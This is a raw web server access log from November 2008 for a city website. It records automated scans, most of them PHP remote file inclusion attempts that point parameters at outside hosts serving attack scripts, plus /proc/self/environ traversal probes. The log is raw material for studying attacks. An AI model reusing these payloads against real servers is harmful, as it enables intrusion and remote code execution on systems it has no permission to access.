219.85.63.226 - - [30/Nov/2008:19:14:24 -0800] "GET /logs/access_080331.log/public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://www.enosi.org/html/v84.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "cityofarkadelphia.com"
75.125.207.2 - - [30/Nov/2008:19:15:29 -0800] "GET /logs/access_080731.log/database.php?mosConfig_absolute_path=http://www.enosi.org/html/v84.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "cityofarkadelphia.com"
75.125.207.2 - - [30/Nov/2008:19:15:29 -0800] "GET /database.php?mosConfig_absolute_path=http://www.enosi.org/html/v84.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "cityofarkadelphia.com"
75.125.207.2 - - [30/Nov/2008:19:15:29 -0800] "GET /logs/database.php?mosConfig_absolute_path=http://www.enosi.org/html/v84.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "cityofarkadelphia.com"
75.125.207.2 - - [30/Nov/2008:19:15:47 -0800] "GET /logs/access_080331.log/database.php?mosConfig_absolute_path=http://www.enosi.org/html/v84.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "cityofarkadelphia.com"
206.225.82.192 - - [30/Nov/2008:19:16:05 -0800] "GET /logs/access_080201.log/errors.php?error=http://www.g0v4z.kit.net/x/arab.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "cityofarkadelphia.com"
206.225.82.192 - - [30/Nov/2008:19:16:05 -0800] "GET /errors.php?error=http://www.g0v4z.kit.net/x/arab.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "cityofarkadelphia.com"
206.225.82.192 - - [30/Nov/2008:19:16:05 -0800] "GET /logs/errors.php?error=http://www.g0v4z.kit.net/x/arab.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "cityofarkadelphia.com"
219.85.63.226 - - [30/Nov/2008:19:16:20 -0800] "GET /logs/public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://www.efeyl.org/wiki/backups/sp.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "cityofarkadelphia.com"
219.85.63.226 - - [30/Nov/2008:19:16:20 -0800] "GET /logs/access_080731.log/public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://www.efeyl.org/wiki/backups/sp.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "cityofarkadelphia.com"
219.85.63.226 - - [30/Nov/2008:19:16:20 -0800] "GET /public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://www.efeyl.org/wiki/backups/sp.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "cityofarkadelphia.com"
219.85.63.226 - - [30/Nov/2008:19:17:39 -0800] "GET /logs/access_080331.log/public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://www.efeyl.org/wiki/backups/sp.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "cityofarkadelphia.com"
206.225.82.192 - - [30/Nov/2008:19:22:36 -0800] "GET /logs/access_071231.log/errors.php?error=http://www.g0v4z.kit.net/x/arab.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "cityofarkadelphia.com"
200.155.18.50 - - [30/Nov/2008:19:22:38 -0800] "GET /logs/access_080901.log/errors.php?error=http://www.tecfedericotaylor.edu.gt/gif/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "cityofarkadelphia.com"
200.155.18.50 - - [30/Nov/2008:19:22:39 -0800] "GET /errors.php?error=http://www.tecfedericotaylor.edu.gt/gif/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "cityofarkadelphia.com"
200.155.18.50 - - [30/Nov/2008:19:22:39 -0800] "GET /logs/errors.php?error=http://www.tecfedericotaylor.edu.gt/gif/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "cityofarkadelphia.com"
72.32.58.235 - - [30/Nov/2008:19:24:56 -0800] "GET /index.php?secao=../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 275 "-" "libwww-perl/5.813" "cityofarkadelphia.com"
72.32.58.235 - - [30/Nov/2008:19:24:56 -0800] "GET /logs/access_080501.log/index.php?secao=../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 275 "-" "libwww-perl/5.813" "cityofarkadelphia.com"
72.32.58.235 - - [30/Nov/2008:19:24:56 -0800] "GET /logs/index.php?secao=../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 275 "-" "libwww-perl/5.813" "cityofarkadelphia.com"
69.61.54.26 - - [30/Nov/2008:19:30:53 -0800] "GET /logs/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://www.seanbatt.com/gallery/ee_commerce/id.txt???%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "cityofarkadelphia.com"
69.61.54.26 - - [30/Nov/2008:19:30:53 -0800] "GET /xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://www.seanbatt.com/gallery/ee_commerce/id.txt???%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "cityofarkadelphia.com"
69.61.54.26 - - [30/Nov/2008:19:30:53 -0800] "GET /logs/access.log/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://www.seanbatt.com/gallery/ee_commerce/id.txt???%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "cityofarkadelphia.com"
62.44.72.229 - - [30/Nov/2008:19:34:06 -0800] "GET /errors.php?error=http://you-buy-viagra.com/files/copyright.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "cityofarkadelphia.com"
62.44.72.229 - - [30/Nov/2008:19:34:06 -0800] "GET /logs/access_080329.log%20%20/errors.php?error=http://you-buy-viagra.com/files/copyright.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "cityofarkadelphia.com"
62.44.72.229 - - [30/Nov/2008:19:34:06 -0800] "GET /logs/errors.php?error=http://you-buy-viagra.com/files/copyright.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "cityofarkadelphia.com"
62.44.72.229 - - [30/Nov/2008:19:35:40 -0800] "GET /logs/access.log%20%20/errors.php?error=http://you-buy-viagra.com/files/copyright.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "cityofarkadelphia.com"
202.177.163.186 - - [30/Nov/2008:19:37:30 -0800] "GET //vwar/backup/errors.php?error=http://pgeh.hs.kr/~meca/zb41pl4/idbr.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "cityofarkadelphia.com"
202.177.163.186 - - [30/Nov/2008:19:37:30 -0800] "GET /logs/access_080329.log///vwar/backup/errors.php?error=http://pgeh.hs.kr/~meca/zb41pl4/idbr.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "cityofarkadelphia.com"
202.177.163.186 - - [30/Nov/2008:19:37:32 -0800] "GET /logs///vwar/backup/errors.php?error=http://pgeh.hs.kr/~meca/zb41pl4/idbr.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "cityofarkadelphia.com"
59.106.13.183 - - [30/Nov/2008:19:44:21 -0800] "GET /modules/vwar/admin/admin.php?vwar_root=http://geocities.com/feelcomz/fx29id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "cityofarkadelphia.com"
59.106.13.183 - - [30/Nov/2008:19:44:21 -0800] "GET /logs/access.log//modules/vwar/admin/admin.php?vwar_root=http://geocities.com/feelcomz/fx29id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "cityofarkadelphia.com"
59.106.13.183 - - [30/Nov/2008:19:44:21 -0800] "GET /logs//modules/vwar/admin/admin.php?vwar_root=http://geocities.com/feelcomz/fx29id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "cityofarkadelphia.com"
59.106.13.183 - - [30/Nov/2008:19:47:27 -0800] "GET /components/com_performs/performs.php?mosConfig_absolute_path=http://geocities.com/feelcomz/fx29id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "cityofarkadelphia.com"
59.106.13.183 - - [30/Nov/2008:19:47:27 -0800] "GET /logs/components/com_performs/performs.php?mosConfig_absolute_path=http://geocities.com/feelcomz/fx29id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "cityofarkadelphia.com"
59.106.13.183 - - [30/Nov/2008:19:47:27 -0800] "GET /logs/access.log%20%20/components/com_performs/performs.php?mosConfig_absolute_path=http://geocities.com/feelcomz/fx29id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "cityofarkadelphia.com"
59.106.13.183 - - [30/Nov/2008:19:48:17 -0800] "GET /logs/access_080201.log%20%20/components/com_performs/performs.php?mosConfig_absolute_path=http://geocities.com/feelcomz/fx29id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "cityofarkadelphia.com"
62.44.72.229 - - [30/Nov/2008:19:48:58 -0800] "GET /logs/access_080329.log/errors.php?error=http://you-buy-viagra.com/files/copyright.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "cityofarkadelphia.com"
91.121.81.213 - - [30/Nov/2008:19:50:59 -0800] "GET /logs/http://members.lycos.co.uk/gghack/cmd?& HTTP/1.1" 404 275 "-" "libwww-perl/5.813" "cityofarkadelphia.com"
91.121.81.213 - - [30/Nov/2008:19:50:59 -0800] "GET /http://members.lycos.co.uk/gghack/cmd?& HTTP/1.1" 404 275 "-" "libwww-perl/5.813" "cityofarkadelphia.com"
59.106.13.183 - - [30/Nov/2008:19:52:57 -0800] "GET /logs/access.log/components/com_performs/performs.php?mosConfig_absolute_path=http://geocities.com/feelcomz/fx29id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "cityofarkadelphia.com"
59.106.13.183 - - [30/Nov/2008:19:53:03 -0800] "GET /logs/access_080201.log/components/com_performs/performs.php?mosConfig_absolute_path=http://geocities.com/feelcomz/fx29id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "cityofarkadelphia.com"
202.123.69.25 - - [30/Nov/2008:19:53:30 -0800] "GET /logs/access_080201.log/errors.php?error=http://www.mfa.gov.bt/kethek-id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "cityofarkadelphia.com"
202.123.69.25 - - [30/Nov/2008:19:53:30 -0800] "GET /logs/errors.php?error=http://www.mfa.gov.bt/kethek-id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "cityofarkadelphia.com"
202.123.69.25 - - [30/Nov/2008:19:53:30 -0800] "GET /errors.php?error=http://www.mfa.gov.bt/kethek-id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "cityofarkadelphia.com"
202.123.69.25 - - [30/Nov/2008:19:53:33 -0800] "GET /logs/access_080201.log/errors.php?error=http://www.mfa.gov.bt/kethek-id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "cityofarkadelphia.com"
202.123.69.25 - - [30/Nov/2008:19:53:33 -0800] "GET /logs/errors.php?error=http://www.mfa.gov.bt/kethek-id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "cityofarkadelphia.com"
202.123.69.25 - - [30/Nov/2008:19:53:33 -0800] "GET /errors.php?error=http://www.mfa.gov.bt/kethek-id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "cityofarkadelphia.com"
208.69.192.200 - - [30/Nov/2008:19:58:31 -0800] "GET /logs/access_081031.log//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://genthonx.gardenbattle.com/iku/idv6.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "cityofarkadelphia.com"
208.69.192.200 - - [30/Nov/2008:19:58:31 -0800] "GET /administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://genthonx.gardenbattle.com/iku/idv6.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "cityofarkadelphia.com"
208.69.192.200 - - [30/Nov/2008:19:58:31 -0800] "GET /logs//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://genthonx.gardenbattle.com/iku/idv6.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "cityofarkadelphia.com"
77.221.130.11 - - [30/Nov/2008:20:02:38 -0800] "GET /logs/access.log/com_performs/performs.php?$mosConfig_absolute_path=http://bl4ckb0t.com/bot/arab/id.la???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "cityofarkadelphia.com"
77.221.130.11 - - [30/Nov/2008:20:02:38 -0800] "GET /com_performs/performs.php?$mosConfig_absolute_path=http://bl4ckb0t.com/bot/arab/id.la???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "cityofarkadelphia.com"
77.221.130.11 - - [30/Nov/2008:20:02:39 -0800] "GET /logs/com_performs/performs.php?$mosConfig_absolute_path=http://bl4ckb0t.com/bot/arab/id.la???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "cityofarkadelphia.com"
77.221.130.11 - - [30/Nov/2008:20:08:12 -0800] "GET /logs/access_080201.log/com_performs/performs.php?$mosConfig_absolute_path=http://bl4ckb0t.com/bot/arab/id.la???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "cityofarkadelphia.com"
59.106.13.183 - - [30/Nov/2008:20:13:40 -0800] "GET /login.php?dir=http://geocities.com/feelcomz/fx29id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "cityofarkadelphia.com"
59.106.13.183 - - [30/Nov/2008:20:13:41 -0800] "GET /logs//login.php?dir=http://geocities.com/feelcomz/fx29id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "cityofarkadelphia.com"
59.106.13.183 - - [30/Nov/2008:20:13:41 -0800] "GET /logs/access_080401.log//login.php?dir=http://geocities.com/feelcomz/fx29id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "cityofarkadelphia.com"
59.106.13.183 - - [30/Nov/2008:20:14:47 -0800] "GET /logs/access_080401.log%20%20//login.php?dir=http://geocities.com/feelcomz/fx29id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "cityofarkadelphia.com"
59.106.13.183 - - [30/Nov/2008:20:16:32 -0800] "GET /logs/access_080201.log%20%20//login.php?dir=http://geocities.com/feelcomz/fx29id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "cityofarkadelphia.com"
195.221.254.1 - - [30/Nov/2008:20:23:24 -0800] "GET /logs/access_080901.log//errors.php?error=http://220.134.244.157/xoops/templates_c/id3.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "cityofarkadelphia.com"
195.221.254.1 - - [30/Nov/2008:20:23:24 -0800] "GET /errors.php?error=http://220.134.244.157/xoops/templates_c/id3.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "cityofarkadelphia.com"
195.221.254.1 - - [30/Nov/2008:20:23:24 -0800] "GET /logs//errors.php?error=http://220.134.244.157/xoops/templates_c/id3.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "cityofarkadelphia.com"
59.106.13.183 - - [30/Nov/2008:20:26:31 -0800] "GET /logs/access_080201.log//login.php?dir=http://geocities.com/feelcomz/fx29id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "cityofarkadelphia.com"
213.193.220.6 - - [30/Nov/2008:20:36:29 -0800] "GET /logs//bookmark4u/lostpasswd.php?env%5Binclude_prefix%5D=http://www.duvase.com.ar/components/com_joomla/bot.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.0; SunOS 5.9 sun4u; X11)" "cityofarkadelphia.com"
213.193.220.6 - - [30/Nov/2008:20:36:29 -0800] "GET /bookmark4u/lostpasswd.php?env%5Binclude_prefix%5D=http://www.duvase.com.ar/components/com_joomla/bot.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.0; SunOS 5.9 sun4u; X11)" "cityofarkadelphia.com"
72.32.58.235 - - [30/Nov/2008:20:36:33 -0800] "GET /logs/cmd.php?page=../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 275 "-" "libwww-perl/5.813" "cityofarkadelphia.com"
72.32.58.235 - - [30/Nov/2008:20:36:33 -0800] "GET /cmd.php?page=../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 275 "-" "libwww-perl/5.813" "cityofarkadelphia.com"
72.32.58.235 - - [30/Nov/2008:20:36:33 -0800] "GET /logs/access_071101.log/cmd.php?page=../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 275 "-" "libwww-perl/5.813" "cityofarkadelphia.com"
72.32.58.235 - - [30/Nov/2008:20:36:45 -0800] "GET /logs/access_080101.log/cmd.php?page=../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 275 "-" "libwww-perl/5.813" "cityofarkadelphia.com"
195.10.6.66 - - [30/Nov/2008:20:40:38 -0800] "GET /?GALLERY_BASEDIR=http://www.casaboyer.fr/edm//lib/Log/Run/id.txt?? HTTP/1.1" 200 917 "-" "libwww-perl/5.79" "cityofarkadelphia.com"
189.38.57.194 - - [30/Nov/2008:20:41:22 -0800] "GET /logs/access.log/phpffl/phpffl_webfiles/program_files/livedraft/admin.php?PHPFFL_FILE_ROOT=http://www.g0v4z.kit.net/x/arab.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "cityofarkadelphia.com"
189.38.57.194 - - [30/Nov/2008:20:41:22 -0800] "GET /phpffl/phpffl_webfiles/program_files/livedraft/admin.php?PHPFFL_FILE_ROOT=http://www.g0v4z.kit.net/x/arab.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "cityofarkadelphia.com"
189.38.57.194 - - [30/Nov/2008:20:41:22 -0800] "GET /logs/phpffl/phpffl_webfiles/program_files/livedraft/admin.php?PHPFFL_FILE_ROOT=http://www.g0v4z.kit.net/x/arab.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "cityofarkadelphia.com"
189.38.57.194 - - [30/Nov/2008:20:42:36 -0800] "GET /logs/access_080731.log/phpffl/phpffl_webfiles/program_files/livedraft/admin.php?PHPFFL_FILE_ROOT=http://www.g0v4z.kit.net/x/arab.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "cityofarkadelphia.com"
206.225.82.192 - - [30/Nov/2008:20:44:34 -0800] "GET /logs/access_080201.log//?path%5Bdocroot%5D=http://www.g0v4z.kit.net/x/arab.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "cityofarkadelphia.com"
206.225.82.192 - - [30/Nov/2008:20:44:34 -0800] "GET /?path%5Bdocroot%5D=http://www.g0v4z.kit.net/x/arab.txt?? HTTP/1.1" 200 917 "-" "libwww-perl/5.803" "cityofarkadelphia.com"
206.225.82.192 - - [30/Nov/2008:20:44:34 -0800] "GET /logs//?path%5Bdocroot%5D=http://www.g0v4z.kit.net/x/arab.txt?? HTTP/1.1" 200 4089 "-" "libwww-perl/5.803" "cityofarkadelphia.com"
202.123.69.25 - - [30/Nov/2008:20:44:48 -0800] "GET /logs/access.log/phpffl/phpffl_webfiles/program_files/livedraft/livedraft.php?PHPFFL_FILE_ROOT=http://www.g0v4z.kit.net/x/arab.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "cityofarkadelphia.com"
202.123.69.25 - - [30/Nov/2008:20:44:48 -0800] "GET /phpffl/phpffl_webfiles/program_files/livedraft/livedraft.php?PHPFFL_FILE_ROOT=http://www.g0v4z.kit.net/x/arab.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "cityofarkadelphia.com"
202.123.69.25 - - [30/Nov/2008:20:44:49 -0800] "GET /logs/phpffl/phpffl_webfiles/program_files/livedraft/livedraft.php?PHPFFL_FILE_ROOT=http://www.g0v4z.kit.net/x/arab.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "cityofarkadelphia.com"
202.123.69.25 - - [30/Nov/2008:20:47:11 -0800] "GET /logs/access_080731.log/phpffl/phpffl_webfiles/program_files/livedraft/livedraft.php?PHPFFL_FILE_ROOT=http://www.g0v4z.kit.net/x/arab.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "cityofarkadelphia.com"
206.225.82.192 - - [30/Nov/2008:20:50:51 -0800] "GET /logs/access_080330.log//?path%5Bdocroot%5D=http://www.g0v4z.kit.net/x/arab.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "cityofarkadelphia.com"
59.126.46.141 - - [30/Nov/2008:21:01:22 -0800] "GET /logs/access_080731.log/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://www.g0v4z.kit.net/x/arab.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "cityofarkadelphia.com"
59.126.46.141 - - [30/Nov/2008:21:01:23 -0800] "GET /administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://www.g0v4z.kit.net/x/arab.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "cityofarkadelphia.com"
59.126.46.141 - - [30/Nov/2008:21:01:24 -0800] "GET /logs/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://www.g0v4z.kit.net/x/arab.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "cityofarkadelphia.com"
193.230.176.5 - - [30/Nov/2008:21:01:41 -0800] "GET /administrator/components/com_jcs/views/reports.html.php?mosConfig_absolute_path=http://www.kuiwa.at/safe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "cityofarkadelphia.com"
194.146.225.109 - - [30/Nov/2008:21:16:11 -0800] "GET /media.php?page=http://www.kuiwa.at/spider.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "cityofarkadelphia.com"
194.146.225.109 - - [30/Nov/2008:21:18:59 -0800] "GET /media.php?page=http://www.ctg.su/system/require/ec.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "cityofarkadelphia.com"
194.146.225.109 - - [30/Nov/2008:21:21:36 -0800] "GET /logs/access_080731.log/media.php?page=http://www.kuiwa.at/spider.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "cityofarkadelphia.com"
194.146.225.109 - - [30/Nov/2008:21:21:37 -0800] "GET /logs/media.php?page=http://www.kuiwa.at/spider.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "cityofarkadelphia.com"
194.146.225.109 - - [30/Nov/2008:21:21:38 -0800] "GET /logs/access_080329.log/media.php?page=http://www.kuiwa.at/spider.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "cityofarkadelphia.com"
194.146.225.109 - - [30/Nov/2008:21:23:00 -0800] "GET /logs/access_080731.log/media.php?page=http://www.ctg.su/system/require/ec.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "cityofarkadelphia.com"
194.146.225.109 - - [30/Nov/2008:21:23:01 -0800] "GET /logs/media.php?page=http://www.ctg.su/system/require/ec.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "cityofarkadelphia.com"
194.146.225.109 - - [30/Nov/2008:21:23:01 -0800] "GET /logs/access_080329.log/media.php?page=http://www.ctg.su/system/require/ec.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "cityofarkadelphia.com"
59.126.46.141 - - [30/Nov/2008:21:39:54 -0800] "GET /logs/access.log/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://www.g0v4z.kit.net/x/arab.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "cityofarkadelphia.com"
193.230.176.5 - - [30/Nov/2008:21:42:06 -0800] "GET /logs/access_081031.log/administrator/components/com_jcs/views/reports.html.php?mosConfig_absolute_path=http://www.kuiwa.at/safe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "cityofarkadelphia.com"
193.230.176.5 - - [30/Nov/2008:21:42:06 -0800] "GET /administrator/components/com_jcs/views/reports.html.php?mosConfig_absolute_path=http://www.kuiwa.at/safe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "cityofarkadelphia.com"
193.230.176.5 - - [30/Nov/2008:21:42:06 -0800] "GET /logs/administrator/components/com_jcs/views/reports.html.php?mosConfig_absolute_path=http://www.kuiwa.at/safe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "cityofarkadelphia.com"
200.49.155.60 - - [30/Nov/2008:22:08:36 -0800] "GET /?path%5Bdocroot%5D=http://danceschoolgloucestershire.co.uk//assets/snippets/reflect/gif/newid.txt? HTTP/1.1" 200 917 "-" "libwww-perl/5.79" "cityofarkadelphia.com"
131.95.109.21 - - [30/Nov/2008:22:08:48 -0800] "GET /?path%5Bdocroot%5D=http://danceschoolgloucestershire.co.uk//assets/snippets/reflect/gif/newid.txt? HTTP/1.1" 200 917 "-" "libwww-perl/5.79" "cityofarkadelphia.com"
131.95.109.21 - - [30/Nov/2008:22:08:48 -0800] "GET /?path%5Bdocroot%5D=http://danceschoolgloucestershire.co.uk//assets/snippets/reflect/gif/newid.txt? HTTP/1.1" 200 917 "-" "libwww-perl/5.79" "cityofarkadelphia.com"
131.95.109.21 - - [30/Nov/2008:22:08:48 -0800] "GET /?path%5Bdocroot%5D=http://danceschoolgloucestershire.co.uk//assets/snippets/reflect/gif/newid.txt? HTTP/1.1" 200 917 "-" "libwww-perl/5.79" "cityofarkadelphia.com"
131.95.109.21 - - [30/Nov/2008:22:08:48 -0800] "GET /?path%5Bdocroot%5D=http://danceschoolgloucestershire.co.uk//assets/snippets/reflect/gif/newid.txt? HTTP/1.1" 200 917 "-" "libwww-perl/5.79" "cityofarkadelphia.com"
81.29.67.201 - - [30/Nov/2008:22:10:01 -0800] "GET /?path%5Bdocroot%5D=http://danceschoolgloucestershire.co.uk//assets/snippets/reflect/gif/newid.txt? HTTP/1.1" 200 917 "-" "libwww-perl/5.805" "cityofarkadelphia.com"
81.29.67.201 - - [30/Nov/2008:22:10:37 -0800] "GET /?path%5Bdocroot%5D=http://danceschoolgloucestershire.co.uk//assets/snippets/reflect/gif/newid.txt? HTTP/1.1" 200 917 "-" "libwww-perl/5.805" "cityofarkadelphia.com"
81.29.67.201 - - [30/Nov/2008:22:11:13 -0800] "GET /?path%5Bdocroot%5D=http://danceschoolgloucestershire.co.uk//assets/snippets/reflect/gif/newid.txt? HTTP/1.1" 200 917 "-" "libwww-perl/5.805" "cityofarkadelphia.com"
66.160.185.20 - - [30/Nov/2008:22:11:38 -0800] "GET /components/com_flyspray/startdown.php?file=http://220.134.244.157/xoops/templates_c/id3.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "cityofarkadelphia.com"
81.29.67.201 - - [30/Nov/2008:22:15:28 -0800] "GET /logs/access_080201.log//?path%5Bdocroot%5D=http://danceschoolgloucestershire.co.uk//assets/snippets/reflect/gif/newid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "cityofarkadelphia.com"
81.29.67.201 - - [30/Nov/2008:22:15:28 -0800] "GET /?path%5Bdocroot%5D=http://danceschoolgloucestershire.co.uk//assets/snippets/reflect/gif/newid.txt? HTTP/1.1" 200 917 "-" "libwww-perl/5.805" "cityofarkadelphia.com"
81.29.67.201 - - [30/Nov/2008:22:15:28 -0800] "GET /logs//?path%5Bdocroot%5D=http://danceschoolgloucestershire.co.uk//assets/snippets/reflect/gif/newid.txt? HTTP/1.1" 200 4089 "-" "libwww-perl/5.805" "cityofarkadelphia.com"
81.29.67.201 - - [30/Nov/2008:22:16:16 -0800] "GET /logs/access_080201.log//?path%5Bdocroot%5D=http://danceschoolgloucestershire.co.uk//assets/snippets/reflect/gif/newid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "cityofarkadelphia.com"
81.29.67.201 - - [30/Nov/2008:22:16:16 -0800] "GET /?path%5Bdocroot%5D=http://danceschoolgloucestershire.co.uk//assets/snippets/reflect/gif/newid.txt? HTTP/1.1" 200 917 "-" "libwww-perl/5.805" "cityofarkadelphia.com"
81.29.67.201 - - [30/Nov/2008:22:16:17 -0800] "GET /logs//?path%5Bdocroot%5D=http://danceschoolgloucestershire.co.uk//assets/snippets/reflect/gif/newid.txt? HTTP/1.1" 200 4089 "-" "libwww-perl/5.805" "cityofarkadelphia.com"
81.29.67.201 - - [30/Nov/2008:22:16:19 -0800] "GET /logs/access_080201.log//?path%5Bdocroot%5D=http://danceschoolgloucestershire.co.uk//assets/snippets/reflect/gif/newid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "cityofarkadelphia.com"
81.29.67.201 - - [30/Nov/2008:22:16:19 -0800] "GET /?path%5Bdocroot%5D=http://danceschoolgloucestershire.co.uk//assets/snippets/reflect/gif/newid.txt? HTTP/1.1" 200 917 "-" "libwww-perl/5.805" "cityofarkadelphia.com"
